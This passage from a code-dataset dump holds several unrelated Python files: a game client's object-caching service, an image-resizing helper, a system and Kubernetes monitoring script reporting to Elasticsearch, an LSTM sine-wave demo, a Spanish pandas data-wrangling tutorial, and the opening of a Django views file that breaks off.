objectID, objectVersion, nodeID)\n else:\n remoteObject = gpcs.RemoteServiceCall(session, nodeID, 'objectCaching', 'GetCachableObject', shared, objectID, objectVersion, nodeID)\n self.cachedObjects[objectID] = remoteObject\n self.__CacheIsDirty('cachedObjects', objectID)\n elif macho.mode == 'proxy':\n remoteObject = gpcs.RemoteServiceCall(self.session, nodeID, 'objectCaching', 'GetCachableObject', shared, objectID, objectVersion, nodeID)\n if not remoteObject.compressed and len(remoteObject.pickle) > 200:\n try:\n t = ClockThis('objectCaching::compress', zlib.compress, remoteObject.pickle, 1)\n except zlib.error as e:\n raise RuntimeError('Compression Failure: ' + strx(e))\n\n if len(t) < len(remoteObject.pickle):\n remoteObject.compressed = 1\n remoteObject.pickle = t\n if remoteObject.shared:\n self.cachedObjects[objectID] = remoteObject\n self.__CacheIsDirty('cachedObjects', objectID)\n else:\n del self.cachedObjects[objectID]\n return remoteObject\n elif macho.mode == 'server':\n self.LogError(\"Some dude asked me for a cached object I just don't have, objectID=\", objectID, ', objectVersion=', objectVersion, ', nodeID=', nodeID)\n del self.cachedObjects[objectID]\n raise RuntimeError(\"I don't have %s, which just don't make sense....\" % repr(objectID))\n finally:\n semaphore.release()\n\n if not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n\n else:\n if macho.mode == 'server' and not self.cachedObjects[objectID].shared:\n tmp = self.cachedObjects[objectID]\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n del self.cachedObjects[objectID]\n return tmp\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n finally:\n callTimer.Done()\n\n return\n\n def CacheObject(self, object):\n shared, objectID, objectVersion, nodeID, cachedObject, thePickle, compressed = object.MachoGetCachedObjectGuts()\n if objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__NewerVersion(self.cachedObjects[objectID].version, objectVersion):\n self.LogInfo('CacheObject: inserting or updating ', objectID, ' into cachedObjects')\n if cachedObject is not None or thePickle is not None:\n if objectID in self.cachedObjects and self.cachedObjects[objectID].pickle is not None:\n self.cachedBytes.Dec(len(self.cachedObjects[objectID].pickle))\n self.cachedObjects[objectID] = CachedObject(shared, objectID, objectVersion, nodeID, cachedObject, thePickle, compressed)\n if thePickle is not None:\n self.cachedBytes.Add(len(thePickle))\n else:\n log.LogTraceback('Unexpected CacheObject request')\n self.__CacheIsDirty('cachedObjects', objectID)\n return\n\n def __NewerVersion(self, oldVersion, newVersion):\n if oldVersion[1] != newVersion[1]:\n return newVersion[0] > oldVersion[0]\n return 0\n\n def __OlderVersion(self, oldVersion, newVersion):\n if oldVersion[1] != newVersion[1]:\n return oldVersion[0] < newVersion[0]\n return 0\n\n def __GetMethodCallCachingDetails(self, serviceOrObject, serviceOrObjectName, method):\n if serviceOrObject is not None:\n exportedCalls = getattr(serviceOrObject, '__exportedcalls__', None)\n if exportedCalls is not None:\n methodInfo = exportedCalls.get(method, None)\n if methodInfo is not None:\n if type(methodInfo) == types.DictType and 'caching' in methodInfo:\n return methodInfo['caching']\n return\n else:\n return self.methodCallCachingDetails.get((serviceOrObjectName, method), None)\n return\n\n def GetCachedMethodCallVersion(self, serviceOrObject, serviceOrObjectName, method, args):\n details = self.__GetMethodCallCachingDetails(serviceOrObject, serviceOrObjectName, method)\n if details is not None:\n si = []\n if details.get('sessionInfo', None):\n si = [\n getattr(session, details['sessionInfo'], None)]\n k = tuple([serviceOrObjectName, method] + si + list(args))\n if k in self.cachedMethodCalls:\n if isinstance(self.cachedMethodCalls[k]['rret'].result, utilCachedObject) and macho.mode == 'proxy':\n if sm.services['machoNet'].GetTransportOfNode(self.cachedMethodCalls[k]['rret'].result.__nodeID__) is None:\n del self.cachedMethodCalls[k]\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') says cachable, but on dead server so go for it')\n return 0\n return self.cachedMethodCalls[k]['version'][1]\n return 0\n\n def __UpdateStatisticsGetCachableObject(self, objectID, objectVersion, object):\n k = objectID\n if len(objectID) == 3 and objectID[0] == 'Method Call':\n if objectID[1] != macho.mode:\n k = '::'.join(objectID[2][:2])\n else:\n k = objectID[1:]\n k = self.__SanitizeCachingKey(k)\n if k not in self.cachedObjectReturnStatistics:\n self.cachedObjectReturnStatistics[k] = [\n 0, 0]\n self.cachedObjectReturnStatistics[k][0] += 1\n if macho.mode != 'client':\n self.cachedObjectReturnStatistics[k][1] += object.GetSize()\n\n def __SanitizeCachingKey(self, k):\n if type(k) in (types.ListType, types.TupleType):\n ret = []\n for each in k:\n tmp = self.__SanitizeCachingKey(each)\n if tmp:\n ret.append(tmp)\n\n if ret and ret[0] == macho.mode:\n ret = ret[1:]\n if len(ret) == 1:\n return ret[0]\n return tuple(ret)\n elif type(k) in (types.IntType, types.LongType, types.FloatType):\n return 0\n else:\n return k\n\n def ReturnCachedResults(self, cachable, versionCheck, throwOK, cachedResultRecord, cacheKey, cacheDetails):\n base.CachedMethodCalled(cacheKey, cacheDetails)\n return (cachable, versionCheck, throwOK, cachedResultRecord, cacheKey, cacheDetails)\n\n def PerformCachedMethodCall(self, serviceOrObject, serviceOrObjectName, method, args, remoteVersion=None):\n details = self.__GetMethodCallCachingDetails(serviceOrObject, serviceOrObjectName, method)\n if details is not None:\n si = []\n if details.get('sessionInfo', None):\n si = [\n getattr(session, details['sessionInfo'], None)]\n k = tuple([serviceOrObjectName, method] + si + list(args))\n if k in self.cachedMethodCalls:\n if isinstance(self.cachedMethodCalls[k]['rret'].result, utilCachedObject) and macho.mode == 'proxy':\n if sm.services['machoNet'].GetTransportOfNode(self.cachedMethodCalls[k]['rret'].result.__nodeID__) is None:\n del self.cachedMethodCalls[k]\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') says cachable, but on dead server so go for it')\n return self.ReturnCachedResults(1, 0, 0, None, k, details)\n versionCheck = self.__ShouldVersionCheck(details, self.cachedMethodCalls[k])\n if remoteVersion is None or remoteVersion == 1 or self.__OlderVersion(remoteVersion, self.cachedMethodCalls[k]['version']):\n throwOK = 0\n else:\n throwOK = 1\n self.cachedMethodCalls[k]['used'] = blue.os.GetWallclockTime()\n if versionCheck:\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') returning a cached result that requires version checking.')\n else:\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') returning a cached result')\n return self.ReturnCachedResults(1, versionCheck, throwOK, self.cachedMethodCalls[k], k, details)\n elif remoteVersion is not None and remoteVersion != 1 and self.__GetVersionCheckType(details) == 'never':\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') the caller seems to know the result, and we can live with that')\n return self.ReturnCachedResult(1, 0, 1, None, k, details)\n else:\n if remoteVersion is not None and remoteVersion != 1:\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') is cachable, but not cached. remoteVersion=', remoteVersion, ', details=', details, ', vc type=', self.__GetVersionCheckType(details))\n else:\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') is cachable, but not cached.')\n return self.ReturnCachedResults(1, 0, 0, None, k, details)\n else:\n return self.ReturnCachedResults(0, 0, 0, None, None, None)\n return\n\n if cacheSessionVariables is not None:\n __cachedsessionvariables__ = tuple(list(cacheSessionVariables) + __cachedsessionvariables__)\n else:\n __cachedsessionvariables__ = tuple(__cachedsessionvariables__)\n\n def CacheMethodCall(self, serviceOrObjectName, method, args, cmcr):\n k = (\n serviceOrObjectName, method)\n if k not in self.methodCallCachingDetails:\n self.methodCallCachingDetails[k] = cmcr.details\n self.__CacheIsDirty('methodCallCachingDetails', k)\n details = cmcr.details\n else:\n details = self.methodCallCachingDetails[serviceOrObjectName, method]\n base.CachedMethodCalled(k, cmcr.details)\n if self.__GetVersionCheckType(details) is not None:\n si = []\n if details.get('sessionInfo', None):\n if macho.mode != 'client' and details['sessionInfo'] not in self.__cachedsessionvariables__:\n self.LogInfo('ObjectCaching cannot cache by sessionInfo ', details['sessionInfo'], ' on ', macho.mode)\n return\n gsi = getattr(session, details['sessionInfo'], None)\n si = [gsi]\n ret, version = cmcr.GetResult(), cmcr.GetVersion()\n k = tuple([serviceOrObjectName, method] + si + list(args))\n used = self.__CacheIsDirty('cachedMethodCalls', k)\n self.cachedMethodCalls[k] = {'lret': ret,'rret': cmcr,\n 'version': version,'used': used,'runid': self.runid}\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') cached the method call for future reference.')\n return\n\n def __GetVersionCheckType(self, details):\n vc = details.get('versionCheck', 'run')\n if type(vc) == types.TupleType:\n if macho.mode == 'server':\n vc = vc[2]\n elif macho.mode == 'proxy':\n vc = vc[1]\n else:\n vc = vc[0]\n return vc\n\n def IsCachedOnProxy(self, details):\n if details.get('sessionInfo', None) and details.get('sessionInfo', None) not in self.__cachedsessionvariables__:\n return False\n else:\n vc = details.get('versionCheck', 'run')\n if type(vc) == types.TupleType:\n return vc[1] is not None\n return vc is not None\n\n def UpdateVersionCheckPeriod(self, cacheKey):\n try:\n cacheEntry = self.cachedMethodCalls.get(cacheKey, None)\n if cacheEntry is None:\n self.LogWarn('ObjectCaching unable to update validity period for cache key', cacheKey, 'key not valid')\n else:\n self.LogInfo('ObjectCaching resetting validity period for cache key', cacheKey)\n cacheEntry['version'][0] = blue.os.GetWallclockTime()\n except Exception as e:\n log.LogException('ObjectCaching unknown exception while resetting validity period')\n\n return\n\n def __ShouldVersionCheck(self, details, info):\n vc = self.__GetVersionCheckType(details)\n now = blue.os.GetWallclockTime()\n if type(vc) in types.StringTypes:\n if vc == 'never':\n return 0\n if vc == 'always':\n return 1\n if vc in ('run', 'utcmidnight', 'utcmidnight_or_3hours'):\n if info.get('runid', 0) == self.runid:\n if vc != 'run':\n midnight = (info.get('runid', 0) / const.DAY + 1) * const.DAY\n if vc == 'utcmidnight':\n maxAge = midnight - now\n else:\n maxAge = min(midnight - now, 3 * const.HOUR)\n else:\n return 0\n else:\n info['runid'] = self.runid\n return 1\n else:\n maxAge = self.__versionchecktimes__[vc]\n else:\n maxAge = int(vc)\n age = now - info['version'][0]\n if maxAge <= age:\n return 1\n else:\n return 0\n\n\nclass CachedObject():\n __guid__ = 'objectCaching.CachedObject'\n __passbyvalue__ = 1\n\n def __init__(self, s, oid, v, n, o, p, c):\n self.version, self.object, self.nodeID, self.shared, self.pickle, self.compressed, self.objectID = (\n v, o, n, s,\n p, c, oid)\n\n def __getstate__(self):\n if self.pickle is not None:\n o = None\n else:\n o = self.object\n return (self.version, o, self.nodeID,\n self.shared, self.pickle,\n self.compressed, self.objectID)\n\n def __str__(self):\n try:\n return 'objectCaching.CachedObject(objectID=%s, version=%s, nodeID=%s, shared=%s, compressed=%s)' % (self.objectID,\n self.version, self.nodeID,\n self.shared, self.compressed)\n except:\n sys.exc_clear()\n return 'objectCaching.CachedObject(???)'\n\n def __setstate__(self, state):\n self.object = None\n self.version, self.object, self.nodeID, self.shared, self.pickle, self.compressed, self.objectID = state\n return\n\n def GetObject(self):\n if self.object is None:\n if self.pickle is None:\n raise RuntimeError('Getting cached object contents, but both the object and the pickle are none')\n try:\n if self.compressed:\n try:\n dasPickle = zlib.decompress(self.pickle)\n except zlib.error as e:\n raise RuntimeError('Decompression Failure: ' + strx(e))\n\n self.object = blue.marshal.Load(dasPickle)\n else:\n self.object = blue.marshal.Load(self.pickle)\n except:\n sm.GetService('objectCaching').LogError('Failed to acquire object from objectCaching.CachedObject, self=', self)\n raise\n\n return self.object\n\n def CompressedPart(self):\n if not self.compressed or self.pickle is None:\n return 0\n else:\n return len(self.pickle)\n\n def GetSize(self):\n if self.pickle is None:\n self.pickle = blue.marshal.Save(self.object)\n return len(self.pickle)\n\n\nclass CachedMethodCallResult():\n __guid__ = 'objectCaching.CachedMethodCallResult'\n __passbyvalue__ = 1\n\n def __init__(self, key, details, result):\n self.details = details\n if isinstance(result, utilCachedObject):\n self.result = result\n self.version = None\n elif sm.services['objectCaching'].IsCachedOnProxy(details) and macho.mode != 'client':\n self.result = utilCachedObject(1, ('Method Call', macho.mode, key), result)\n sm.services['objectCaching'].CacheObject(self.result)\n self.version = None\n else:\n self.result = blue.marshal.Save(result)\n self.version = [blue.os.GetWallclockTime(), zlib.adler32(self.result)]\n return\n\n def __getstate__(self):\n return (\n self.details, self.result,\n self.version)\n\n def __setstate__(self, state):\n self.details, self.result, self.version = state\n\n def GetVersion(self):\n if isinstance(self.result, utilCachedObject):\n return list(self.result.__objectVersion__)\n return self.version\n\n def IsSameVersion(self, machoVersion):\n if machoVersion != 1:\n return self.GetVersion()[1] == machoVersion[1]\n return 0\n\n def GetResult(self):\n if isinstance(self.result, utilCachedObject):\n return self.result.GetCachedObject()\n else:\n return blue.marshal.Load(self.result)\n\n def __str__(self):\n try:\n if isinstance(self.result, utilCachedObject):\n return 'objectCaching.CachedMethodCallResult(version=%s, result=%s)' % (self.version, self.result)\n return 'objectCaching.CachedMethodCallResult(version=%s)' % (self.version,)\n except:\n sys.exc_clear()\n return 'objectCaching.CachedMethodCallResult(???)'\n\n\nclass CacheOK(StandardError):\n __guid__ = 'objectCaching.CacheOK'\n __passbyvalue__ = 1\n\n def __init__(self, value='CacheOK', *args):\n StandardError.__init__(self, value, *args)","sub_path":"client/carbon/common/script/net/objectCaching.py","file_name":"objectCaching.py","file_ext":"py","file_size_in_byte":32027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38131709","text":"from PIL import Image\nimport uuid\n\ndef toDimensions(image_file, out_file, dim_x, dim_y, allowLow=True, return_file_object=False):\n im = Image.open(image_file)\n im_x = im.size[0]\n im_y = im.size[1]\n flag = True\n if not allowLow:\n flag = (im_x >= dim_x) and (im_y >= dim_y)\n if flag:\n aspectRatioIn = im_x / float(im_y)\n aspectRatioOut = dim_x / float(dim_y)\n if(aspectRatioIn > aspectRatioOut):\n fin_y = im_y\n fin_x = im_y * aspectRatioOut\n elif(aspectRatioIn < aspectRatioOut):\n fin_y = im_x/aspectRatioOut\n fin_x = im_x\n else:\n fin_x = im_x\n fin_y = im_y\n box = (int((im_x - fin_x)/2), int((im_y - fin_y)/2), int((im_x + fin_x)/2), int((im_y + fin_y)/2) )\n im = im.crop(box)\n im = im.resize((dim_x,dim_y))\n if return_file_object:\n from StringIO import StringIO\n out_file = StringIO()\n im.convert('RGB').save(out_file, \"jpeg\")\n out_file.seek(0)\n else:\n im.convert('RGB').save(out_file, \"jpeg\")\n return out_file\n else:\n raise Exception(\"Small Size\")\n\n\ndef sanitize_profile_pic(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 240, 240)\n return path\n\ndef get_profile_pic_thumb(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 50, 50)\n return path\n\ndef sanitize_cover_pic(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 320, 560)\n return path\n\ndef resize_video_thumb(image_file, height=262, width=262):\n path = ''\n return toDimensions(image_file, path, height, width, return_file_object=True)\n\n\n","sub_path":"franklyapi/image_processors/dimension.py","file_name":"dimension.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397528168","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport yaml\nimport psutil\nimport pprint\nimport datetime\nimport platform\nimport warnings\nfrom elastic import elastic\n\npp = pprint.PrettyPrinter(indent=4)\nwarnings.filterwarnings(\"ignore\")\n\ndef get_kube_data(name):\n data = {}\n try:\n from kubernetes import client, config\n try: config.load_incluster_config()\n except: config.load_kube_config()\n version = client.VersionApi()\n v1 = client.CoreV1Api()\n except Exception as x:\n print(\"ERROR: Could not connect to kubernetes: {0}\".format(x))\n else:\n data.update({\"datetime\": datetime.datetime.utcnow()})\n data.update({\"k8s_name\": name})\n data.update({\"k8s_version\": version.get_code().git_version})\n\n nodes = v1.list_node().items\n cpu = 0; mem = 0 \n for node in nodes:\n try:\n cpu += int(node.status.capacity[\"cpu\"])\n mem += int(node.status.capacity[\"memory\"][:-2])\n except Exception:\n continue\n \n data.update({\"k8s_cpu\": cpu})\n data.update({\"k8s_memory\": round(int(mem/1024/1024),0)})\n data.update({\"k8s_nodes\": len(v1.list_node().items)})\n data.update({\"k8s_pods\": len(v1.list_pod_for_all_namespaces().items)})\n data.update({\"k8s_pvcs\": len(v1.list_persistent_volume_claim_for_all_namespaces().items)})\n #data.update({\"k8s_secrets\": len(v1.list_secret_for_all_namespaces().items)})\n data.update({\"k8s_services\": len(v1.list_service_for_all_namespaces().items)})\n\n return data\n\ndef get_docker_data():\n data = {}\n try:\n import docker\n client = docker.from_env()\n except Exception as x:\n print(\"ERROR: Could not connect to docker daemon: {0}\".format(x))\n else:\n data.update({\"dck_version\": client.version()[\"Components\"][0][\"Version\"]})\n data.update({\"dck_containers\": len(client.containers.list())})\n data.update({\"dck_images\": len(client.images.list())})\n\n return data\n\ndef get_system_data():\n print(\"INFO: getting system data\")\n data = {}\n data.update({\"server\": platform.uname()[1]})\n data.update({\"datetime\": datetime.datetime.utcnow()})\n data.update({\"os\": platform.uname()[2]})\n data.update({\"uptime\": datetime.datetime.fromtimestamp(psutil.boot_time())})\n data.update({\"cpu_prc\": round(psutil.cpu_percent(interval=1), 2)})\n data.update({\"mem_prc\": round(psutil.virtual_memory()[2], 2)})\n data.update({\"disc_prc\": round(psutil.disk_usage('/')[3], 2)})\n data.update({\"net_in\": psutil.net_io_counters()[1]})\n data.update({\"net_out\": psutil.net_io_counters()[0]})\n\n sensors = (\"bcm2835_thermal\", \"acpitz\", \"cpu-thermal\", \"radeon\")\n data.update({\"temp\": 0})\n for sensor in sensors:\n try: data.update({\"temp\": psutil.sensors_temperatures()[sensor][0][1]})\n except: continue\n else: break\n\n try:\n load = psutil.getloadavg()\n except Exception:\n load = (0, 0, 0)\n data.update({\"load1\": load[0]})\n data.update({\"load5\": load[1]})\n data.update({\"load15\": load[2]})\n\n # special case\n data.update({\"work\": \"wfica\" in (p.name() for p in psutil.process_iter())})\n\n return data\n\ndef read_config():\n directory = os.path.dirname(os.path.realpath(__file__))\n filename = \"config.yaml\"\n print(\"INFO: using config: %s/%s\" % (directory, filename))\n with open(r'%s/%s' % (directory, filename)) as file:\n documents = yaml.full_load(file)\n config = {}\n for item, doc in documents.items():\n config.update({item: doc})\n return config\n\ndef update_client():\n if datetime.datetime.utcnow().minute == 59:\n print(\"INFO: updating repo\")\n os.system(\"git pull\")\n\nif __name__ == '__main__':\n config = read_config()\n pp.pprint(config)\n\n # configure backend and send data\n try:\n url = config[\"elastic\"][\"url\"]\n username = config[\"elastic\"][\"user\"] \n password = config[\"elastic\"][\"pass\"]\n except Exception as x:\n print(\"ERROR: found no database credentials: {0}\".format(x))\n else:\n data = {}\n print(\"INFO: collecting data ...\")\n if config[\"monitor\"][\"system\"][\"enabled\"]:\n data.update(get_system_data())\n if config[\"monitor\"][\"system\"][\"updater\"]: update_client()\n if config[\"monitor\"][\"docker\"][\"enabled\"]:\n data.update(get_docker_data())\n if config[\"monitor\"][\"kube\"][\"enabled\"]:\n data.update(get_kube_data(config[\"monitor\"][\"kube\"][\"name\"]))\n\n print(\"INFO: sending data to elastic ...\")\n pp.pprint(data)\n\n if url and username and password:\n client = elastic(url, username, password)\n client.push_data(data)\n else:\n print(\"ERROR: credentials are missing values\")\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120053246","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np \nimport tensorflow as tf \nimport matplotlib as mpl \nfrom matplotlib import pyplot as plt \nfrom tensorflow.contrib.learn.python.learn.estimators.estimator import SKCompat \nimport numpy as np\nfrom pandas import read_csv\nfrom matplotlib import pyplot as plt\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense,LSTM\nfrom keras.layers.core import Dropout\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n# TensorFlow的高层封装TFLearn \nlearn = tf.contrib.learn \nseed = 7\nbatch_size = 30\nepochs = 20\nfilename = '/home/kayky/project/POI motion data tracked with TPS model/Phantom-II.csv'\nfooter = 3\nlook_back=10\n# 神经网络参数 \nHIDDEN_SIZE = 30 # LSTM隐藏节点个数 \nNUM_LAYERS = 2 # LSTM层数 \nTIMESTEPS = 10 # 循环神经网络截断长度 \nBATCH_SIZE = 32 \n# batch大小 \n# 数据参数 \nTRAINING_STEPS = 3000 \n# 训练轮数 \nTRAINING_EXAMPLES = 10000\n # 训练数据个数 \nTESTING_EXAMPLES = 1000 \n# 测试数据个数 \nSAMPLE_GAP = 0.01 # 采样间隔 \ndef generate_data(seq): # 序列的第i项和后面的TIMESTEPS-1项合在一起作为输入,第i+TIMESTEPS项作为输出 \n X = [] \n y = [] \n for i in range(len(seq) - TIMESTEPS - 1): \n X.append([seq[i:i + TIMESTEPS]]) \n y.append([seq[i + TIMESTEPS]]) \n return np.array(X, dtype=np.float32), np.array(y, dtype=np.float32) \n \n# 用sin生成训练和测试数据集 \ntest_start = TRAINING_EXAMPLES * SAMPLE_GAP \ntest_end = (TRAINING_EXAMPLES + TESTING_EXAMPLES) * SAMPLE_GAP \ntrain_X, train_y = generate_data( \n np.sin(np.linspace(0, test_start, TRAINING_EXAMPLES, dtype=np.float32))) \nprint(train_X)\nprint(train_y)\ntest_X, test_y = generate_data( \n np.sin( np.linspace(test_start, test_end, TESTING_EXAMPLES, dtype=np.float32))) \nprint(test_X)\nprint(test_y)\ndef build_model():\n model = Sequential()\n model.add(LSTM(units=10, input_shape=(1, look_back)))\n model.add(Dense(units=1,activation='sigmoid'))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n\nif __name__ == '__main__':\n\n # 设置随机种子\n np.random.seed(seed)\n\n # 导入数据\n \n\n \n\n\n\n # 训练模型\n model = build_model()\n model.fit(train_X, train_y, epochs=epochs, batch_size=batch_size, verbose=2)\n print(model.summary())\n # 模型预测数据\n predict_train = model.predict(train_X)\n predict_validation = model.predict(test_X)\n print(predict_train)\n print(predict_validation)\n # 评估模型\n train_score = model.evaluate(train_X, train_y, verbose=0)\n print('Train Score: %.2f MSE (%.2f RMSE)' % (train_score, math.sqrt(train_score)))\n validation_score = model.evaluate(test_X, test_y, verbose=0)\n print('Validatin Score: %.2f MSE (%.2f RMSE)' % (validation_score, math.sqrt(validation_score)))\n\n\n \n","sub_path":"goodcode/sin.py","file_name":"sin.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576954906","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# # Data Wrangling - La cirugía de los datos\n\n# In[1]:\n\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n\n# El **data wrangling**, a veces denominada **data munging**, es el proceso de transformar y mapear datos de un dataset *raw* (en bruto) en otro formato con la intención de hacerlo más apropiado y valioso para una variedad de propósitos posteriores, como el análisis. Un **data wrangler** es una persona que realiza estas operaciones de transformación.\n# \n# Esto puede incluir munging, visualización de datos, agregación de datos, entrenamiento de un modelo estadístico, así como muchos otros usos potenciales. La oscilación de datos como proceso generalmente sigue un conjunto de pasos generales que comienzan extrayendo los datos en forma cruda del origen de datos, dividiendo los datos en bruto usando algoritmos (por ejemplo, clasificación) o analizando los datos en estructuras de datos predefinidas, y finalmente depositando el contenido resultante en un sistema de almacenamiento (o silo) para su uso futuro.\n\n# In[ ]:\n\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ndata = pd.read_csv(\"/content/drive/My Drive/Curso Machine Learning con Python/datasets/customer-churn-model/Customer Churn Model.txt\")\n\n\n# In[5]:\n\n\ndata.head()\n\n\n# ### Crear un subconjunto de datos\n\n# #### Subconjunto de columna o columnas\n\n# In[ ]:\n\n\naccount_length = data[\"Account Length\"]\n\n\n# In[7]:\n\n\naccount_length.head()\n\n\n# In[8]:\n\n\ntype(account_length)\n\n\n# In[ ]:\n\n\nsubset = data[[\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]]\n\n\n# In[10]:\n\n\nsubset.head()\n\n\n# In[11]:\n\n\ntype(subset)\n\n\n# In[12]:\n\n\ndesired_columns = [\"Account Length\", \"Phone\", \"Eve Charge\", \"Night Calls\"]\nsubset = data[desired_columns]\nsubset.head()\n\n\n# In[13]:\n\n\ndesired_columns = [\"Account Length\", \"VMail Message\", \"Day Calls\"]\ndesired_columns\n\n\n# In[14]:\n\n\nall_columns_list = data.columns.values.tolist()\nall_columns_list\n\n\n# In[15]:\n\n\nsublist = [x for x in all_columns_list if x not in desired_columns]\nsublist\n\n\n# In[16]:\n\n\nsubset = data[sublist]\nsubset.head()\n\n\n# #### Subconjunto de filas\n\n# In[17]:\n\n\ndata[1:25]\n\n\n# In[18]:\n\n\ndata[10:35]\n\n\n# In[19]:\n\n\ndata[:8] # CORRECCIÓN: es lo mismo que data[0:8]\n\n\n# In[20]:\n\n\ndata[3320:]\n\n\n# #### Subconjuntos de filas con condiciones booleanas\n\n# In[21]:\n\n\n##Usuarios con Day Mins > 300\ndata1 = data[data[\"Day Mins\"]>300]\ndata1.shape\n\n\n# In[22]:\n\n\n##Usuarios de Nueva York (State = \"NY\")\ndata2 = data[data[\"State\"]==\"NY\"]\ndata2.shape\n\n\n# In[23]:\n\n\n##AND -> &\ndata3 = data[(data[\"Day Mins\"]>300) & (data[\"State\"]==\"NY\")]\ndata3.shape\n\n\n# In[24]:\n\n\n##OR -> |\ndata4 = data[(data[\"Day Mins\"]>300) | (data[\"State\"]==\"NY\")]\ndata4.shape\n\n\n# In[25]:\n\n\ndata5 = data[data[\"Day Calls\"] loc e iloc\n\n# In[ ]:\n\n\ndata.ix[1:10, 3:6] ## Primeras 10 filas, columnas de la 3 a la 6\n\n\n# In[29]:\n\n\ndata.iloc[1:10, 3:6]\n\n\n# In[30]:\n\n\ndata.iloc[:,3:6] ##Todas las filas para las columnas entre la 3 y la 6\ndata.iloc[1:10,:] ##Todas las columnas para las filas de la 1 a la 10\n\n\n# In[31]:\n\n\ndata.iloc[1:10, [2,5,7]]\n\n\n# In[32]:\n\n\ndata.iloc[[1,5,8,36], [2,5,7]]\n\n\n# In[33]:\n\n\ndata.loc[[1,5,8,36], [\"Area Code\", \"VMail Plan\", \"Day Mins\"]]\n\n\n# #### Insertar nuevas filas en el dataframe\n\n# In[ ]:\n\n\ndata[\"Total Mins\"] = data[\"Day Mins\"] + data[\"Night Mins\"] + data[\"Eve Mins\"]\n\n\n# In[35]:\n\n\ndata[\"Total Mins\"].head()\n\n\n# In[ ]:\n\n\ndata[\"Total Calls\"] = data[\"Day Calls\"] + data[\"Night Calls\"] + data[\"Eve Calls\"]\n\n\n# In[37]:\n\n\ndata[\"Total Calls\"].head()\n\n\n# In[38]:\n\n\ndata.shape\n\n\n# In[39]:\n\n\ndata.head()\n\n\n# ### Generación aleatoria de números\n\n# In[ ]:\n\n\nimport numpy as np\n\n\n# In[41]:\n\n\n##Generar un número aleatorio entero entre 1 y 100\nnp.random.randint(1,100)\n\n\n# In[42]:\n\n\n##La forma más clásica de generar un número aleatorio es entre 0 y 1 (con decimales)\nnp.random.random()\n\n\n# In[ ]:\n\n\n##Función que genera una lista de n números aleatorios enteros dentro del intervalo [a,b]\ndef randint_list(n, a, b):\n x = []\n for i in range(n):\n x.append(np.random.randint(a,b))\n return x\n\n\n# In[44]:\n\n\nrandint_list(25, 1, 50)\n\n\n# In[ ]:\n\n\nimport random\n\n\n# In[46]:\n\n\nfor i in range(10):\n print(random.randrange(0, 100,7))\n\n\n# #### Shuffling\n\n# In[47]:\n\n\na = np.arange(100)\na\n\n\n# In[ ]:\n\n\nnp.random.shuffle(a)\n\n\n# In[49]:\n\n\na\n\n\n# #### Choice\n\n# In[50]:\n\n\ndata.head()\n\n\n# In[51]:\n\n\ndata.shape\n\n\n# In[52]:\n\n\ncolumn_list = data.columns.values.tolist()\ncolumn_list\n\n\n# In[53]:\n\n\nnp.random.choice(column_list)\n\n\n# #### Seed\n\n# In[54]:\n\n\nnp.random.seed(2018)\nfor i in range(5):\n print(np.random.random())\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Scripts_Ipynb2Py/T2 - 1 - Data Cleaning - Data Wrangling.py","file_name":"T2 - 1 - Data Cleaning - Data Wrangling.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314296405","text":"import os\nimport json\nfrom django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import JsonResponse\nfrom django.db.models import Sum\n\nfrom .models import Chat\n\nfrom analytics.Conversation import Conversation\nfrom analytics.Analyzer import Analyzer\nfrom analytics.NpEncoder import NpEncoder\n\n\ndef place_value(number): \n return (\"{:,}\".format(number))\n\ndef get_msg_number():\n message_count = Chat.objects.aggregate(Sum('messages'))['messages__sum']\n if message_count:\n return place_value(message_count)\n return 0\n\ndef get_chat_number():\n chat_count = Chat.objects.all().count()\n if chat_count:\n return 